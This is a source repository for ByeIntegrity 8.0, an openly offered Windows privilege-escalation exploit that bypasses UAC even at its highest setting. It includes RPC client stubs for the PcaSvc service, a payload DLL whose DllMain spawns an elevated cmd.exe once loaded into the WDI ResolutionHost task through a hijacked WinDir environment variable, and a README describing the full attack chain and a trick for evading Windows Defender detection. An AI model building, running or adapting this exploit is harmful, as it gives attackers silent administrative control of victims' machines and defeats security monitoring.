├── example.apng
├── ByeIntegrity8
├── pcasvc.acf
├── pcasvc7.acf
├── pcasvc7.idl
├── pcasvc.idl
├── resource.h
├── ByeIntegrity8.vcxproj.filters
├── ByeIntegrity8.rc
├── pcasvc.h
├── pcasvc7.h
├── pcasvc7_c.c
├── ByeIntegrity8.vcxproj
├── pcasvc_c.c
└── byeintegrity8.c
├── PcaPayload
├── PcaPayload.vcxproj.filters
├── payload.c
└── PcaPayload.vcxproj
├── byeintegrity8-uac.sln
├── .gitattributes
├── README.md
├── .gitignore
└── diagram.svg
/example.apng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AzAgarampur/byeintegrity8-uac/HEAD/example.apng
--------------------------------------------------------------------------------
/ByeIntegrity8/pcasvc.acf:
--------------------------------------------------------------------------------
// ACF for the PcaService interface declared in pcasvc.idl.
// [explicit_handle] makes MIDL give every procedure a handle_t binding handle
// as its first parameter (see pcasvc.h), so the caller supplies its own
// binding to PcaSvc instead of relying on an implicit/auto-bind handle.
[
explicit_handle
]
interface PcaService
{
RAiMonitorProcess();
}
--------------------------------------------------------------------------------
/ByeIntegrity8/pcasvc7.acf:
--------------------------------------------------------------------------------
// ACF for the Windows 7 variant of the PcaSvc interface (pcasvc7.idl; the
// README describes why Windows 7 needs a different procedure).
// [explicit_handle]: the caller passes an explicit handle_t binding as the
// first argument of the procedure rather than using an implicit binding.
[
explicit_handle
]
interface PcaService7
{
RAiNotifyUserCallbackExceptionProcess();
}
--------------------------------------------------------------------------------
/PcaPayload/PcaPayload.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/ByeIntegrity8/pcasvc7.idl:
--------------------------------------------------------------------------------
// Client-side IDL for the PcaSvc RPC interface as used on Windows 7
// (README, "How it works"). The uuid and version are the same as in
// pcasvc.idl; the two files differ only in which procedure is declared.
// The procedure number (opnum) in the generated stub pcasvc7_c.c was edited
// by hand to match the server; regenerating from this IDL requires re-applying
// that edit (see the header comment of pcasvc7.h / pcasvc7_c.c).
[
uuid(0767a036-0d22-48aa-ba69-b619480f38cb),
version(1.0),
]
interface PcaService7
{
// Per the README, this is the routine PcaSvc calls on itself when it sees an
// unhandled exception in a user callback, which makes it launch the PCA
// diagnostic module. exePathName is [string] without [unique], so it must
// not be NULL. The meaning of unknown0 is not established here; the caller
// (byeintegrity8.c, not in this listing) chooses it.
long RAiNotifyUserCallbackExceptionProcess(
handle_t bindingHandle,
[in][string] wchar_t* exePathName,
[in]long unknown0,
[in]long processId
);
}
--------------------------------------------------------------------------------
/ByeIntegrity8/pcasvc.idl:
--------------------------------------------------------------------------------
// Client-side IDL for the PcaSvc RPC interface used on Windows 8+ (README,
// "How it works"): RAiMonitorProcess asks PcaSvc to monitor a process, which
// is what Explorer normally does through pcacli!PcaMonitorProcess. Same uuid
// and version as pcasvc7.idl.
[
uuid(0767a036-0d22-48aa-ba69-b619480f38cb),
version(1.0),
]
interface PcaService
{
// hProcess is a pointer-sized integer (MIDL __int3264), presumably carrying a
// process HANDLE value — confirm against the caller. The three [unique]
// strings may be NULL. unknown0 and flags: meaning not established here.
long RAiMonitorProcess(
handle_t bindingHandle,
[in]unsigned __int3264 hProcess,
[in]long unknown0,
[in][unique][string]wchar_t* exeFileName,
[in][unique][string]wchar_t* cmdLine,
[in][unique][string]wchar_t* workingDir,
[in]long flags
);
}
--------------------------------------------------------------------------------
/ByeIntegrity8/resource.h:
--------------------------------------------------------------------------------
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by ByeIntegrity8.rc
//
// IDR_PAYLOAD1 is the resource ID under which ByeIntegrity8.rc embeds the
// built PcaPayload.dll (custom resource type PAYLOAD). The main executable
// presumably extracts the DLL from this resource at run time; that code is
// not part of this listing.
#define IDR_PAYLOAD1 101

// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
17 |
--------------------------------------------------------------------------------
/ByeIntegrity8/ByeIntegrity8.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 | IDL
20 |
21 |
22 | IDL
23 |
24 |
25 | IDL
26 |
27 |
28 |
29 |
30 | {49e5c2b1-4d1b-4cdf-b186-b1e86110bf4a}
31 |
32 |
33 |
34 |
35 | IDL
36 |
37 |
38 |
--------------------------------------------------------------------------------
/ByeIntegrity8/ByeIntegrity8.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // PAYLOAD
51 | //
52 |
// Custom resource type PAYLOAD holding the x64 Release build of PcaPayload.dll
// at a fixed relative path. The path does not follow this project's own
// configuration/platform, so a Debug or Win32 build of ByeIntegrity8 still
// embeds the x64 Release payload (or fails if it has not been built) — in line
// with the README's note that x86 is not supported.
IDR_PAYLOAD1 PAYLOAD "..\\x64\\Release\\PcaPayload.dll"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/ByeIntegrity8/pcasvc.h:
--------------------------------------------------------------------------------
1 |
2 |
3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */
4 |
5 |
6 | /* File created by MIDL compiler version 8.01.0622 */
7 | /* at Mon Jan 18 19:14:07 2038
8 | */
9 | /* Compiler settings for pcasvc.idl:
10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
11 | protocol : all , ms_ext, c_ext, robust
12 | error checks: allocation ref bounds_check enum stub_data
13 | VC __declspec() decoration level:
14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable)
15 | DECLSPEC_UUID(), MIDL_INTERFACE()
16 | */
17 | /* @@MIDL_FILE_HEADING( ) */
18 |
19 |
20 |
21 | /* verify that the version is high enough to compile this file*/
22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__
23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500
24 | #endif
25 |
26 | #include "rpc.h"
27 | #include "rpcndr.h"
28 |
29 | #ifndef __RPCNDR_H_VERSION__
30 | #error this stub requires an updated version of
31 | #endif /* __RPCNDR_H_VERSION__ */
32 |
33 |
34 | #ifndef __pcasvc_h__
35 | #define __pcasvc_h__
36 |
37 | #if defined(_MSC_VER) && (_MSC_VER >= 1020)
38 | #pragma once
39 | #endif
40 |
41 | /* Forward Declarations */
42 |
43 | #ifdef __cplusplus
44 | extern "C"{
45 | #endif
46 |
47 |
48 | #ifndef __PcaService_INTERFACE_DEFINED__
49 | #define __PcaService_INTERFACE_DEFINED__
50 |
51 | /* interface PcaService */
52 | /* [explicit_handle][version][uuid] */
53 |
/*
 * Client stub for PcaSvc's RAiMonitorProcess (Windows 8+ path, see README):
 * asks PcaSvc to start monitoring a process, the call Explorer normally makes
 * through pcacli!PcaMonitorProcess. bindingHandle is an explicit binding to
 * PcaSvc (pcasvc.acf). The [unique] strings may be NULL. hProcess is
 * presumably a process HANDLE value marshalled as an integer; the meaning of
 * unknown0 and flags is not documented here. Returns the server's status as a
 * long (interpretation not established in this listing).
 */
long RAiMonitorProcess(
    handle_t bindingHandle,
    /* [in] */ unsigned __int3264 hProcess,
    /* [in] */ long unknown0,
    /* [string][unique][in] */ wchar_t *exeFileName,
    /* [string][unique][in] */ wchar_t *cmdLine,
    /* [string][unique][in] */ wchar_t *workingDir,
    /* [in] */ long flags);
62 |
63 |
64 |
65 | extern RPC_IF_HANDLE PcaService_v1_0_c_ifspec;
66 | extern RPC_IF_HANDLE PcaService_v1_0_s_ifspec;
67 | #endif /* __PcaService_INTERFACE_DEFINED__ */
68 |
69 | /* Additional Prototypes for ALL interfaces */
70 |
71 | /* end of Additional Prototypes */
72 |
73 | #ifdef __cplusplus
74 | }
75 | #endif
76 |
77 | #endif
78 |
79 |
80 |
--------------------------------------------------------------------------------
/ByeIntegrity8/pcasvc7.h:
--------------------------------------------------------------------------------
1 |
2 | /*
3 | * I HAVE EDITED THIS FILE BY HAND IN ORDER TO MAKE THIS WORK
4 | * THIS IS NOT THE PURE OUTPUT OF MIDL.EXE
5 | *
6 | * IF YOU ARE COMPILING THE IDL YOURSELF YOU MUST EDIT THE PROCEDURE
7 | * NUMBER IN THIS GENERATED FILE IN ORDER FOR THE CALL TO WORK
8 | */
9 |
10 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */
11 |
12 |
13 | /* File created by MIDL compiler version 8.01.0622 */
14 | /* at Mon Jan 18 19:14:07 2038
15 | */
16 | /* Compiler settings for pcasvc7.idl, pcasvc7.acf:
17 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
18 | protocol : dce , ms_ext, c_ext, robust
19 | error checks: allocation ref bounds_check enum stub_data
20 | VC __declspec() decoration level:
21 | __declspec(uuid()), __declspec(selectany), __declspec(novtable)
22 | DECLSPEC_UUID(), MIDL_INTERFACE()
23 | */
24 | /* @@MIDL_FILE_HEADING( ) */
25 |
26 | #pragma warning( disable: 4049 ) /* more than 64k source lines */
27 |
28 |
29 | /* verify that the version is high enough to compile this file*/
30 | #ifndef __REQUIRED_RPCNDR_H_VERSION__
31 | #define __REQUIRED_RPCNDR_H_VERSION__ 475
32 | #endif
33 |
34 | #include "rpc.h"
35 | #include "rpcndr.h"
36 |
37 | #ifndef __RPCNDR_H_VERSION__
38 | #error this stub requires an updated version of
39 | #endif /* __RPCNDR_H_VERSION__ */
40 |
41 |
42 | #ifndef __pcasvc7_h__
43 | #define __pcasvc7_h__
44 |
45 | #if defined(_MSC_VER) && (_MSC_VER >= 1020)
46 | #pragma once
47 | #endif
48 |
49 | /* Forward Declarations */
50 |
51 | #ifdef __cplusplus
52 | extern "C"{
53 | #endif
54 |
55 |
56 | #ifndef __PcaService7_INTERFACE_DEFINED__
57 | #define __PcaService7_INTERFACE_DEFINED__
58 |
59 | /* interface PcaService7 */
60 | /* [explicit_handle][version][uuid] */
61 |
/*
 * Client stub for the Windows 7 PcaSvc routine that handles an unhandled
 * exception in a user callback (README, "How it works"); calling it makes
 * PcaSvc launch the PCA diagnostic module. bindingHandle is an explicit
 * binding to PcaSvc (pcasvc7.acf). exePathName must not be NULL ([string]
 * without [unique]). unknown0: meaning not documented here. The opnum used on
 * the wire lives in pcasvc7_c.c and was edited by hand (see this file's
 * header); regenerate with care.
 */
long RAiNotifyUserCallbackExceptionProcess(
    handle_t bindingHandle,
    /* [string][in] */ wchar_t *exePathName,
    /* [in] */ long unknown0,
    /* [in] */ long processId);
67 |
68 |
69 |
70 | extern RPC_IF_HANDLE PcaService7_v1_0_c_ifspec;
71 | extern RPC_IF_HANDLE PcaService7_v1_0_s_ifspec;
72 | #endif /* __PcaService7_INTERFACE_DEFINED__ */
73 |
74 | /* Additional Prototypes for ALL interfaces */
75 |
76 | /* end of Additional Prototypes */
77 |
78 | #ifdef __cplusplus
79 | }
80 | #endif
81 |
82 | #endif
83 |
84 |
85 |
--------------------------------------------------------------------------------
/byeintegrity8-uac.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31424.327
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ByeIntegrity8", "ByeIntegrity8\ByeIntegrity8.vcxproj", "{F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}"
7 | ProjectSection(ProjectDependencies) = postProject
8 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0} = {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}
9 | EndProjectSection
10 | EndProject
11 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PcaPayload", "PcaPayload\PcaPayload.vcxproj", "{2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}"
12 | EndProject
13 | Global
14 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
15 | Debug|x64 = Debug|x64
16 | Debug|x86 = Debug|x86
17 | Release|x64 = Release|x64
18 | Release|x86 = Release|x86
19 | EndGlobalSection
20 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
21 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Debug|x64.ActiveCfg = Debug|x64
22 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Debug|x64.Build.0 = Debug|x64
23 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Debug|x86.ActiveCfg = Debug|Win32
24 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Debug|x86.Build.0 = Debug|Win32
25 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Release|x64.ActiveCfg = Release|x64
26 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Release|x64.Build.0 = Release|x64
27 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Release|x86.ActiveCfg = Release|Win32
28 | {F04ACB28-CA8B-40A8-9D8B-3D2550BCE0CD}.Release|x86.Build.0 = Release|Win32
29 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Debug|x64.ActiveCfg = Debug|x64
30 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Debug|x64.Build.0 = Debug|x64
31 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Debug|x86.ActiveCfg = Debug|Win32
32 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Debug|x86.Build.0 = Debug|Win32
33 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Release|x64.ActiveCfg = Release|x64
34 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Release|x64.Build.0 = Release|x64
35 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Release|x86.ActiveCfg = Release|Win32
36 | {2702AD93-DC30-427F-AA64-DEB4CC2EA0A0}.Release|x86.Build.0 = Release|Win32
37 | EndGlobalSection
38 | GlobalSection(SolutionProperties) = preSolution
39 | HideSolutionNode = FALSE
40 | EndGlobalSection
41 | GlobalSection(ExtensibilityGlobals) = postSolution
42 | SolutionGuid = {60EC33C9-4F9B-4717-8291-2CD7D75F1047}
43 | EndGlobalSection
44 | EndGlobal
45 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
# This is needed for earlier builds of msysgit that do not have it on by
# default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/PcaPayload/payload.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
/*
 * WDI diagnostic-module export. WDI calls it to handle the queued diagnostic
 * instance (the Program Compatibility Assistant instance in this attack).
 * Both arguments are ignored. The return value does not appear to matter for
 * the attack; it may influence WDI's own logging.
 */
__declspec(dllexport) HRESULT WdiHandleInstance(
    PVOID instanceData,
    int unused1
)
{
    (void)instanceData;
    (void)unused1;

    return S_OK;
}
16 |
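/*
 * WDI diagnostic-module entry point. It must report success: on failure WDI
 * unloads the module without flushing the diagnostics queue, which would
 * leave the PCA instance queued and re-launch the DM (see README, "How it
 * works"). Both arguments are ignored.
 *
 * Fix: the original marked unused0 as unreferenced twice and never unused1.
 */
__declspec(dllexport) HRESULT WdiDiagnosticModuleMain(
    void* unused0,
    int unused1
)
{
    UNREFERENCED_PARAMETER(unused0);
    UNREFERENCED_PARAMETER(unused1);

    /* Must be a success code, otherwise the module is unloaded and the
     * queue is not flushed. */
    return S_OK;
}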
28 |
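/*
 * Reports the WDI diagnostic-module interface version implemented by this
 * DLL (1). Declared with a (void) prototype instead of an empty parameter
 * list, and the constant is cast to ULONG_PTR so it has the right width on
 * both 32- and 64-bit builds rather than narrowing a 64-bit literal.
 */
__declspec(dllexport) ULONG_PTR WdiGetDiagnosticModuleInterfaceVersion(void)
{
    return (ULONG_PTR)1;
}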
30 |
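/*
 * Returns a newly allocated wide string equal to string followed by
 * appendString, or NULL on allocation failure or if either input is NULL.
 * The buffer comes from the process heap; the caller releases it with
 * HeapFree(GetProcessHeap(), 0, p).
 *
 * Compared with the original: each length is computed once, NULL inputs are
 * rejected instead of dereferenced, the byte count is guarded against
 * wrap-around, and the buffer is sized to exactly
 * len(string) + len(appendString) + 1 characters.
 */
PWSTR PaConcatString(
    PCWSTR string,
    PCWSTR appendString
)
{
    size_t headLen, tailLen, total;
    PWSTR data;

    if (!string || !appendString)
        return NULL;

    headLen = wcslen(string);
    tailLen = wcslen(appendString);
    /* characters, including the single terminating L'\0' */
    total = headLen + tailLen + 1;

    /* Only reachable with absurd lengths, but keeps the multiplication sound. */
    if (total < headLen || total > ((size_t)-1) / sizeof(WCHAR))
        return NULL;

    data = (PWSTR)HeapAlloc(GetProcessHeap(), 0, total * sizeof(WCHAR));
    if (data) {
        memcpy(data, string, headLen * sizeof(WCHAR));
        /* the second copy carries appendString's terminator */
        memcpy(data + headLen, appendString, (tailLen + 1) * sizeof(WCHAR));
    }
    return data;
}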
46 |
/*
 * Payload entry point. Everything happens on DLL_PROCESS_ATTACH: once the
 * WDI ResolutionHost task has loaded this DLL as the PCA diagnostic module
 * (README, "How it works"), this path spawns cmd.exe as a child of the task
 * process, re-launches the ByeIntegrity8 executable with the command line "2"
 * (presumably its stop/cleanup mode; that parser is not in this file) and
 * signals the controller that the payload ran.
 *
 * Returns TRUE on success; FALSE on any failure before the processes are
 * started, which makes the loader fail the load of this module.
 *
 * NOTE(review): CreateProcessW is called from inside DllMain, i.e. under the
 * loader lock, which Microsoft's DllMain guidance advises against. It works
 * for this PoC; keep in mind if the payload grows.
 */
BOOL WINAPI DllMain(
    HINSTANCE hInstance,
    DWORD reason,
    LPVOID reserved
)
{
    UNREFERENCED_PARAMETER(hInstance);
    UNREFERENCED_PARAMETER(reserved);

    if (reason == DLL_PROCESS_ATTACH)
    {
        PWSTR winDir = NULL, system32 = NULL;
        HRESULT hr;
        BOOL exitCode = FALSE;
        PUCHAR exeName = NULL;
        PWSTR cmdPath = NULL;
        STARTUPINFOW si;
        PROCESS_INFORMATION pi;
        HANDLE hSharedMemory, hEvent = NULL;
        WCHAR stopCmd[2];   /* writable: CreateProcessW may modify lpCommandLine */

        /* Rendezvous objects created by the controlling ByeIntegrity8 process
         * (not in this file): a section holding that executable's path and an
         * event the controller waits on.
         * NOTE(review): both are opened by bare name. Whichever process in this
         * session created a "ByeIntegrity8" section first decides the path that
         * is executed below; acceptable for a PoC, but worth knowing. */
        hSharedMemory = OpenFileMappingW(FILE_MAP_WRITE, FALSE, L"ByeIntegrity8");
        if (!hSharedMemory)
            goto eof;

        /* Whole section is mapped. It is assumed to hold a NUL-terminated wide
         * string; no length or terminator check is done here. */
        exeName = MapViewOfFile(hSharedMemory, FILE_MAP_WRITE, 0, 0, 0);
        if (!exeName)
            goto eof;

        hEvent = OpenEventW(EVENT_MODIFY_STATE, FALSE, L"ByeIntegrity8Loaded");
        if (!hEvent)
            goto eof;

        /* Resolve the real Windows and System32 directories through the
         * known-folder API rather than %WinDir%, which the attack redirected
         * in order to get this DLL loaded (README, "Attack overview"). */
        hr = SHGetKnownFolderPath(&FOLDERID_Windows, 0, NULL, &winDir);
        if (!SUCCEEDED(hr))
            goto eof;

        hr = SHGetKnownFolderPath(&FOLDERID_System, 0, NULL, &system32);
        if (!SUCCEEDED(hr))
            goto eof;

        cmdPath = PaConcatString(system32, L"\\cmd.exe");
        if (!cmdPath)
            goto eof;

        /* Put the genuine value back into this process's environment so the
         * children below do not inherit the redirected WinDir. */
        if (!SetEnvironmentVariableW(L"windir", winDir))
            goto eof;

        /* The elevated shell; per the README it inherits the task's token. */
        ZeroMemory(&si, sizeof(STARTUPINFOW));
        si.cb = sizeof(STARTUPINFOW);
        if (!CreateProcessW(cmdPath, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
            goto eof;

        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);

        /* Re-run the controller hidden with command line "2". CreateProcessW
         * passes lpCommandLine verbatim, so the child's entire command line is
         * just "2" (it shows up as argv[0], not argv[1]); the controller must
         * parse it accordingly. Failure here is deliberately ignored. */
        stopCmd[0] = L'2';
        stopCmd[1] = L'\0';
        if (CreateProcessW((LPCWSTR)exeName, stopCmd, NULL, NULL, FALSE,
            CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
            CloseHandle(pi.hProcess);
            CloseHandle(pi.hThread);
        }

        /* Tell the controller the payload has run. */
        SetEvent(hEvent);
        exitCode = TRUE;

    eof:
        if (hSharedMemory)
            CloseHandle(hSharedMemory);
        if (hEvent)
            CloseHandle(hEvent);
        if (exeName)
            UnmapViewOfFile(exeName);
        if (winDir)
            CoTaskMemFree(winDir);
        if (system32)
            CoTaskMemFree(system32);
        if (cmdPath)
            HeapFree(GetProcessHeap(), 0, cmdPath);
        return exitCode;
    }
    return TRUE;
}
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 |
4 |
5 | ByeIntegrity 8.0
6 |
7 |
8 |
9 | The eighth Windows privilege escalation attack in the ByeIntegrity family. ByeIntegrity 8.0 is the most complex one I've created so far; however, because of its complexity, it's able to reveal and exploit hidden design and security flaws in the operating system. After all, it even works when UAC is set to its maximum security level — **AlwaysNotify**.
10 |
11 | ## Attack overview
12 | Just like every other ByeIntegrity attack, ByeIntegrity 8.0 needs to be run under an account with administrator privileges. ByeIntegrity 8.0 relies on the Task Scheduler to start the *WDI ResolutionHost* task. The task is started with an elevated token of the current user that the task scheduler creates. The task proceeds to read parameters from the WDI host and reads from the registry to figure out where to load the requested diagnostic module. These module paths are stored in the registry with the form `%WinDir%\System32\...`. ByeIntegrity 8.0 sets a custom `WinDir` environment variable to load its own payload module into the *ResolutionHost* task, which then launches any program inheriting the full administrative privileges.
13 |
14 | ## How it works
15 | The majority of the ByeIntegrity 8.0 attack is getting the *WDI ResolutionHost* started. This task is triggered to start via an ETW event. There are many services which write events to trigger the task (Windows Resource Exhaustion, Corrupted File Recovery, etc.).
16 |
17 | The Program Compatibility Assistant (PCA) is part of Windows's *Application Experience*, and will automatically monitor processes for problematic behaviors and attempt to resolve them. It is implemented as a service, *PcaSvc*, and in a set of libraries, `apphelp.dll`, being one of them. `apphelp.dll` will hook certain WinAPI functions depending on what *genome* (Application type: Win7RTM, WinBlueRTM, etc.) *PcaSvc* decides the process contains. `apphelp.dll` intercepts the function calls and reports back any possible results to *PcaSvc* via writing ETW events. *PcaSvc* inspects the event information, and if it matches a threshold, *PcaSvc* will attempt to start the *Program Compatibility Assistant Troubleshooter*. This is implemented as a diagnostic module (DM), and it is loaded via the *WDI ResolutionHost* task. *PcaSvc* starts this task with its parameters by triggering it via the PCA's "start diagnostics" ETW event write. (If you're thinking of simply writing this ETW event manually to launch the DM, you'll be greeted with an *Access is denied* error.)
18 | #
ByeIntegrity 8.0 creates this sequence of events in a controlled, exploitable manner. On Windows 8+, only processes launched from Windows Explorer are monitored by *PcaSvc*, as Explorer calls `pcacli!PcaMonitorProcess` to tell *PcaSvc* to start monitoring the process for events. ByeIntegrity 8.0 uses RPC to talk directly to *PcaSvc* to tell it to monitor the "trigger" process ByeIntegrity 8.0 launches. Talking directly via RPC to *PcaSvc* is better, faster and more controlled, and it also allows ByeIntegrity 8.0 to bypass a policy that can disable the PCA if it is set. The "trigger" process writes the two ETW events that `apphelp.dll` would usually write if it detects a program displaying an error message box about running on an incorrect version of Windows.
20 |
21 | On Windows 7, a different method is used. If the PCA detects an unhandled exception that occurs during a user callback, it will attempt to launch the DM. *PcaSvc* monitors all processes launched, nothing is required from explorer here. If such an exception is caught, *PcaSvc* will launch the DM. The function that Windows 7's *PcaSvc* uses to handle detection of an unhandled callback exception is actually an RPC function that *PcaSvc* calls from itself. ByeIntegrity 8.0 once again uses RPC to call this function remotely, triggering the launch of the DM manually.
22 | #
23 | Once the DM is launched, it loads the ByeIntegrity 8.0 *Pca Payload*. This payload acts as a WDI diagnostic module. When loaded, it creates the requested process as a child of the *WDI ResolutionHost* task executable (`taskhostw.exe`). The payload needs to export a few WDI functions in order to function properly. These functions initialize the WDI diagnostics instance (PCA diagnostics in this case) and then flush the diagnostics queue so that ByeIntegrity 8.0 can be run multiple times and so that the PCA does not re-launch the DM multiple times because of the diagnostic instance still being in the queue. Finally, the task is stopped and after cleanup, the whole process can be repeated again.
24 |
25 | ## Attack schema + Windows Defender bypass
26 |
27 | Evident from the above, this is a pretty complex attack that abuses many things:
28 |
29 | - Program Compatibility Assistant
30 | - Poor Windows Defender design
31 | - Environment variables
32 | - Task Scheduler
33 | - DLL Hijack
34 | - ETW
35 | - RPC
36 | - WDI
37 |
38 |
39 | Complete attack diagram
40 |
41 | 
42 |
43 |
Windows Defender was discovered to be a small annoyance while developing this attack. Windows Defender's filter driver catches the creation of a rogue `WinDir` value in the `HKCU\Environment` key. If caught, Windows Defender will eventually kill the offending process. The problem is there is a huge delay between the notification from the filter driver and the action taken by Windows Defender. Every time, Windows Defender completely misses the attack. In order to bypass even detection by Windows Defender, ByeIntegrity 8.0 renames the `HKCU\Environment` key to a random name, creates `WinDir` in the renamed key, then renames it back to `HKCU\Environment`. Windows Defender doesn’t notice a thing. Credit for this trick goes to **@hfiref0x**, who discovered it while working on UACMe method integration.
45 |
46 | ## UACMe
47 | ByeIntegrity 8.0 is implemented in UACMe as method number 69. Implementations are the exact same except UACMe uses only `NdrClientCall2` for RPC calls, and does not use the custom `RpcBindingSetOption()` that ByeIntegrity 8.0 uses. These two differences don't change anything about the attack.
48 |
49 | ## Using the code
If you’re reading this then you probably know how to compile the source. Just note that this hasn’t been tested or designed with x86 in mind at all, and it probably won’t work on x86 anyway: the Windows 7 RPC client stub (`pcasvc7_c.c`) is only compiled when `_M_AMD64` is defined, and the resource script always embeds the x64 Release build of `PcaPayload.dll`.
51 |
52 | Just like UACMe, **I will never upload compiled binaries to this repo.** There are always people who want the world to crash and burn, and I'm not going to provide an easy route for them to run this on somebody else's computer and cause intentional damage. I also don't want script-kiddies to use this attack without understanding what it does and the damage it can cause.
53 |
54 | ## Supported versions
ByeIntegrity 8.0 works from Windows 7 through the latest version of Windows at the time of writing.
--------------------------------------------------------------------------------
